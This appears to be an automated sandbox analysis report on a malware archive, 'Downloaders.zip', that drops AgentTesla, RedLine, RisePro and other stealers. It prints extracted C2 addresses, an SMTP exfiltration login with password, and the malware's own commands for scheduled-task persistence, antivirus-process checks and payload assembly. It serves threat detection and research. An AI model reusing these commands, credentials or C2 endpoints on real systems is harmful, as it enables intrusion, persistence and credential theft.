agenttesla | 16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267

max time kernel
146s
max time network
157s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
11-05-2024 09:17

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Downloaders.zip
Size

12KB
MD5

94fe78dc42e3403d06477f995770733c
SHA1

ea6ba4a14bab2a976d62ea7ddd4940ec90560586
SHA256

16930620b3b9166e0ffbd98f5d5b580c9919fd6ccdcc74fb996f53577f508267
SHA512

add85726e7d2c69068381688fe84defe820f600e6214eff029042e3002e9f4ad52dde3b8bb28f4148cca1b950cd54d3999ce9e8445c4562d1ef2efdb1c6bdeff
SSDEEP

384:6BfwcSEp9ZjKXSBIDv4dDfjlMJ7HWTHWB:efACW6Dr8HWTHWB

Score

10^/10

agenttesla redline risepro sectoprat zgrat client evasion execution infostealer keylogger rat spyware stealer trojan

Malware Config

Extracted

Family

risepro

147.45.47.126:58709

Extracted

Family

agenttesla

Credentials

Protocol: smtp
Host:
mail.mvmconstructores.com
Port:
587
Username:
[email protected]
Password:
5Uc[^}pJj*Nl
Email To:
[email protected]

Extracted

Family

redline

Botnet

client

195.10.205.91:1707

Signatures

AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
keylogger trojan stealer spyware agenttesla

Detect ZGRat V1 29 IoCs

resource	yara_rule
behavioral1/memory/2172-38-0x0000000000400000-0x0000000000490000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-275-0x0000000005D20000-0x00000000061D0000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-276-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-277-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-279-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-283-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-285-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-287-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-293-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-295-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-303-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-307-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-318-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-320-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-330-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-326-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-328-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-322-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-324-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-313-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-309-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-305-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-311-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-301-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-299-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-297-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-291-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-289-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1
behavioral1/memory/2992-281-0x0000000005D20000-0x00000000061CB000-memory.dmp	family_zgrat_v1

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

resource	yara_rule
behavioral1/memory/5656-2763-0x0000000000400000-0x000000000045C000-memory.dmp	family_redline
behavioral1/memory/6508-4322-0x0000000000010000-0x000000000002E000-memory.dmp	family_redline

RisePro
RisePro stealer is an infostealer distributed by PrivateLoader.
stealer risepro
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 1 IoCs

resource	yara_rule
behavioral1/memory/6508-4322-0x0000000000010000-0x000000000002E000-memory.dmp	family_sectoprat

ZGRat
ZGRat is remote access trojan written in C#.
rat zgrat

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
704	powershell.exe
5900	powershell.exe

Downloads MZ/PE file

Sets file to hidden 1 TTPs 1 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
516	attrib.exe

Executes dropped EXE 9 IoCs

pid	Process
436	4363463463464363463463463.exe
4680	New Text Document mod.exe
2208	pafpaf.exe
2912	crypted_87ddcda6.exe
5076	BachelorPhantom.exe
1120	update_3.exe
2684	hjv.exe
1880	060.exe
1488	060.tmp

Loads dropped DLL 4 IoCs

pid	Process
2208	pafpaf.exe
1488	060.tmp
1488	060.tmp
1488	060.tmp

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials In Files
T1552.001

Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs

Web Service

T1102

flow	ioc
150	raw.githubusercontent.com
152	raw.githubusercontent.com
92	pastebin.com
94	pastebin.com
97	pastebin.com

Looks up external IP address via web service 6 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
190	ipinfo.io
191	ipinfo.io
168	api.myip.com
169	api.myip.com
173	ipinfo.io
174	ipinfo.io

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2208 set thread context of 2172	2208	pafpaf.exe	92
PID 2912 set thread context of 4304	2912	crypted_87ddcda6.exe	96

Drops file in Program Files directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\limonitization\rustpletter.ini	hjv.exe

Drops file in Windows directory 4 IoCs

description	ioc	Process
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\1601268389\715946058.pri	taskmgr.exe
File created	C:\Windows\rescache\_merged\4183903823\2290032291.pri	taskmgr.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
6704	5164	WerFault.exe	177

Checks SCSI registry key(s) 3 TTPs 6 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\Properties\{b725f130-47ef-101a-a5f1-02608c9eebac}\000A	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName	taskmgr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_QEMU&Prod_HARDDISK\4&215468a5&0&000000	taskmgr.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	taskmgr.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	taskmgr.exe

Creates scheduled task(s) 1 TTPs 13 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
7680	schtasks.exe
6684	schtasks.exe
6924	schtasks.exe
7052	schtasks.exe
6048	schtasks.exe
5144	schtasks.exe
2344	schtasks.exe
6884	schtasks.exe
6292	schtasks.exe
7328	schtasks.exe
7232	schtasks.exe
7196	schtasks.exe
5160	schtasks.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1992	timeout.exe

Enumerates processes with tasklist 1 TTPs 2 IoCs

Process Discovery

T1057

pid	Process
756	tasklist.exe
364	tasklist.exe

Runs net.exe

Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery

T1018

pid	Process
3644	PING.EXE

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
2172	MSBuild.exe
2172	MSBuild.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe

Suspicious use of AdjustPrivilegeToken 29 IoCs

description	pid	Process
Token: SeRestorePrivilege	4024	7zG.exe
Token: 35	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeSecurityPrivilege	4024	7zG.exe
Token: SeDebugPrivilege	1696	taskmgr.exe
Token: SeSystemProfilePrivilege	1696	taskmgr.exe
Token: SeCreateGlobalPrivilege	1696	taskmgr.exe
Token: SeDebugPrivilege	596	taskmgr.exe
Token: SeSystemProfilePrivilege	596	taskmgr.exe
Token: SeCreateGlobalPrivilege	596	taskmgr.exe
Token: 33	1696	taskmgr.exe
Token: SeIncBasePriorityPrivilege	1696	taskmgr.exe
Token: SeRestorePrivilege	4704	7zG.exe
Token: 35	4704	7zG.exe
Token: SeSecurityPrivilege	4704	7zG.exe
Token: SeSecurityPrivilege	4704	7zG.exe
Token: SeRestorePrivilege	2668	7zG.exe
Token: 35	2668	7zG.exe
Token: SeSecurityPrivilege	2668	7zG.exe
Token: SeSecurityPrivilege	2668	7zG.exe
Token: SeDebugPrivilege	436	4363463463464363463463463.exe
Token: SeDebugPrivilege	4680	New Text Document mod.exe
Token: SeDebugPrivilege	2172	MSBuild.exe
Token: SeBackupPrivilege	2172	MSBuild.exe
Token: SeSecurityPrivilege	2172	MSBuild.exe
Token: SeSecurityPrivilege	2172	MSBuild.exe
Token: SeSecurityPrivilege	2172	MSBuild.exe
Token: SeSecurityPrivilege	2172	MSBuild.exe
Token: SeDebugPrivilege	364	tasklist.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
4024	7zG.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
1696	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe
596	taskmgr.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1696 wrote to memory of 596	1696	taskmgr.exe	80
PID 1696 wrote to memory of 596	1696	taskmgr.exe	80
PID 4680 wrote to memory of 2208	4680	New Text Document mod.exe	90
PID 4680 wrote to memory of 2208	4680	New Text Document mod.exe	90
PID 4680 wrote to memory of 2208	4680	New Text Document mod.exe	90
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 2208 wrote to memory of 2172	2208	pafpaf.exe	92
PID 4680 wrote to memory of 2912	4680	New Text Document mod.exe	93
PID 4680 wrote to memory of 2912	4680	New Text Document mod.exe	93
PID 4680 wrote to memory of 2912	4680	New Text Document mod.exe	93
PID 4680 wrote to memory of 5076	4680	New Text Document mod.exe	95
PID 4680 wrote to memory of 5076	4680	New Text Document mod.exe	95
PID 4680 wrote to memory of 5076	4680	New Text Document mod.exe	95
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 2912 wrote to memory of 4304	2912	crypted_87ddcda6.exe	96
PID 4680 wrote to memory of 1120	4680	New Text Document mod.exe	98
PID 4680 wrote to memory of 1120	4680	New Text Document mod.exe	98
PID 4680 wrote to memory of 1120	4680	New Text Document mod.exe	98
PID 5076 wrote to memory of 4848	5076	BachelorPhantom.exe	99
PID 5076 wrote to memory of 4848	5076	BachelorPhantom.exe	99
PID 5076 wrote to memory of 4848	5076	BachelorPhantom.exe	99
PID 4680 wrote to memory of 2684	4680	New Text Document mod.exe	101
PID 4680 wrote to memory of 2684	4680	New Text Document mod.exe	101
PID 4680 wrote to memory of 2684	4680	New Text Document mod.exe	101
PID 4680 wrote to memory of 1880	4680	New Text Document mod.exe	102
PID 4680 wrote to memory of 1880	4680	New Text Document mod.exe	102
PID 4680 wrote to memory of 1880	4680	New Text Document mod.exe	102
PID 1880 wrote to memory of 1488	1880	060.exe	103
PID 1880 wrote to memory of 1488	1880	060.exe	103
PID 1880 wrote to memory of 1488	1880	060.exe	103
PID 4848 wrote to memory of 364	4848	cmd.exe	104
PID 4848 wrote to memory of 364	4848	cmd.exe	104
PID 4848 wrote to memory of 364	4848	cmd.exe	104
PID 4848 wrote to memory of 1084	4848	cmd.exe	105
PID 4848 wrote to memory of 1084	4848	cmd.exe	105
PID 4848 wrote to memory of 1084	4848	cmd.exe	105

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
516	attrib.exe

C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,C:\Users\Admin\AppData\Local\Temp\Downloaders.zip
1⤵
PID:4400

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:3204

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap24479:80:7zEvent14604
1⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
PID:4024

C:\Windows\system32\taskmgr.exe
"C:\Windows\system32\taskmgr.exe" /4
1⤵
- Drops file in Windows directory
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1696
- C:\Windows\system32\taskmgr.exe
  "C:\Windows\system32\taskmgr.exe" /1
  2⤵
  - Drops file in Windows directory
  - Checks SCSI registry key(s)
  - Checks processor information in registry
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of SendNotifyMessage
  PID:596

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap100:108:7zEvent11881
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4704

C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" x -o"C:\Users\Admin\Desktop\" -an -ai#7zMap11582:110:7zEvent21774
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2668

C:\Users\Admin\Desktop\4363463463464363463463463.exe
"C:\Users\Admin\Desktop\4363463463464363463463463.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:436
- C:\Users\Admin\Desktop\Files\svcyr.exe
  "C:\Users\Admin\Desktop\Files\svcyr.exe"
  2⤵
  PID:928
- C:\Users\Admin\Desktop\Files\net.exe
  "C:\Users\Admin\Desktop\Files\net.exe"
  2⤵
  PID:2992
- C:\Users\Admin\Desktop\Files\svcyr.exe
  "C:\Users\Admin\Desktop\Files\svcyr.exe"
  2⤵
  PID:1752
- C:\Users\Admin\Desktop\Files\LPE_ALL.exe
  "C:\Users\Admin\Desktop\Files\LPE_ALL.exe"
  2⤵
  PID:5016
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c pause
    3⤵
    PID:5944
- C:\Users\Admin\Desktop\Files\ce0b953269c74bc.exe
  "C:\Users\Admin\Desktop\Files\ce0b953269c74bc.exe"
  2⤵
  PID:4540
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:5656
- C:\Users\Admin\Desktop\Files\peinf.exe
  "C:\Users\Admin\Desktop\Files\peinf.exe"
  2⤵
  PID:3780
- - C:\Users\Admin\AppData\Local\Temp\353722286.exe
    C:\Users\Admin\AppData\Local\Temp\353722286.exe
    3⤵
    PID:5128
  - - C:\Windows\sysbrapsvc.exe
      C:\Windows\sysbrapsvc.exe
      4⤵
      PID:5232
    - - C:\Users\Admin\AppData\Local\Temp\2768528125.exe
        
        C:\Users\Admin\AppData\Local\Temp\2768528125.exe
        5⤵
        
        PID:7096
    - - C:\Users\Admin\AppData\Local\Temp\910419021.exe
        
        C:\Users\Admin\AppData\Local\Temp\910419021.exe
        5⤵
        
        PID:6784

C:\Users\Admin\Desktop\New Text Document mod.exe
"C:\Users\Admin\Desktop\New Text Document mod.exe"
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4680
- C:\Users\Admin\Desktop\a\pafpaf.exe
  "C:\Users\Admin\Desktop\a\pafpaf.exe"
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2208
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2172
- C:\Users\Admin\Desktop\a\crypted_87ddcda6.exe
  "C:\Users\Admin\Desktop\a\crypted_87ddcda6.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  - Suspicious use of WriteProcessMemory
  PID:2912
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
    3⤵
    PID:4304
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 HR" /sc HOURLY /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6884
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH2663\MPGPH2663.exe" /tn "MPGPH2663 LG" /sc ONLOGON /rl HIGHEST
      4⤵
      Creates scheduled task(s)
      PID:6684
- C:\Users\Admin\Desktop\a\BachelorPhantom.exe
  "C:\Users\Admin\Desktop\a\BachelorPhantom.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:5076
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" /k move Scholar Scholar.cmd & Scholar.cmd & exit
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4848
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      Suspicious use of AdjustPrivilegeToken
      PID:364
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "wrsa.exe opssvc.exe"
      4⤵
      PID:1084
  - - C:\Windows\SysWOW64\tasklist.exe
      tasklist
      4⤵
      Enumerates processes with tasklist
      PID:756
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
      4⤵
      PID:3576
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c md 55163585
      4⤵
      PID:2604
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V "NovNoneIllustrationsMagic" Dispatched
      4⤵
      PID:4300
  - - C:\Windows\SysWOW64\cmd.exe
      cmd /c copy /b Mode + Lesser + Describes + Gc + Cache + Harper + Lu + Additional + Shadow 55163585\O
      4⤵
      PID:2284
  - - C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\55163585\Alumni.pif
      55163585\Alumni.pif 55163585\O
      4⤵
      PID:2952
  - - C:\Windows\SysWOW64\PING.EXE
      ping -n 5 127.0.0.1
      4⤵
      Runs ping.exe
      PID:3644
- C:\Users\Admin\Desktop\a\update_3.exe
  "C:\Users\Admin\Desktop\a\update_3.exe"
  2⤵
  - Executes dropped EXE
  PID:1120
- C:\Users\Admin\Desktop\a\hjv.exe
  "C:\Users\Admin\Desktop\a\hjv.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Program Files directory
  PID:2684
- C:\Users\Admin\Desktop\a\060.exe
  "C:\Users\Admin\Desktop\a\060.exe"
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:1880
- - C:\Users\Admin\AppData\Local\Temp\is-QJOE0.tmp\060.tmp
    "C:\Users\Admin\AppData\Local\Temp\is-QJOE0.tmp\060.tmp" /SL5="$2049E,4723649,54272,C:\Users\Admin\Desktop\a\060.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    PID:1488
  - - C:\Users\Admin\AppData\Local\Kerato DJ Prof\keratodjprof.exe
      "C:\Users\Admin\AppData\Local\Kerato DJ Prof\keratodjprof.exe" -i
      4⤵
      PID:3080
  - - C:\Users\Admin\AppData\Local\Kerato DJ Prof\keratodjprof.exe
      "C:\Users\Admin\AppData\Local\Kerato DJ Prof\keratodjprof.exe" -s
      4⤵
      PID:4324
- C:\Users\Admin\Desktop\a\gamak.exe
  "C:\Users\Admin\Desktop\a\gamak.exe"
  2⤵
  PID:68
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6048
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MPGPH131\MPGPH131.exe" /tn "MPGPH131 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7052
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7328
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_a6fe0fbb21b26cb805391b2ef50d90c9 LG" /sc ONLOGON /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:7232
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357 HR" /sc HOURLY /rl HIGHEST
    3⤵
    - Creates scheduled task(s)
    PID:6924
- - C:\Windows\SysWOW64\schtasks.exe
    schtasks /create /f /RU "Admin" /tr "C:\ProgramData\MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357\MSIUpdaterV131.exe" /tn "MSIUpdaterV131_eeb341036f887f8bfa41fe84e80e9357 LG" /sc ONLOGON /rl HIGHEST
    3⤵
